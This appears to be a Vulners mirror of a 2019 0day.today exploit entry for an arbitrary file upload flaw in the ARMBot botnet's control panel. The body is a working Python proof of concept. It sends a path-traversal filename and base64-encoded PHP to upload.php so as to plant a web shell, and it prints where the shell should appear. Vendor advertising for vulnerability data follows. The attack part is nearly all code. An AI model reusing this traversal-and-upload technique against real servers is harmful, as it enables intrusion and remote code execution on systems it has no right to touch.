Lucene search
K

ARMBot Botnet - Arbitrary Code Execution Vulnerability

🗓️ 06 Aug 2019 00:00:00Reported by prsecurityType 
zdt
 zdt
🔗 0day.today👁 15 Views

ARMBot Botnet Arbitrary Code Execution Vulnerability allows remote attackers to execute arbitrary code and upload malicious files via a crafted URL. Vulnerability exists in ARMBot Botnet

Code
import requests

URL = "http://127.0.0.1/ARMBot/upload.php"
r = requests.post(URL,
                  data = {
                     "file":"../public_html/lol/../.s.phtml", # need some trickery for each server ;)
                     "data":"PD9waHAgZWNobyAxOyA/Pg==", # <?php echo 1; ?>
                     "message":"Bobr Dobr"
                  }, proxies={"http":"127.0.0.1:8080","https":"127.0.0.1:8080"})
print(r.status_code)
print("shell should be at http://{}/.s.phtml".format(URL))

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Aug 2019 00:00Current
0.9Low risk
Vulners AI Score0.9
15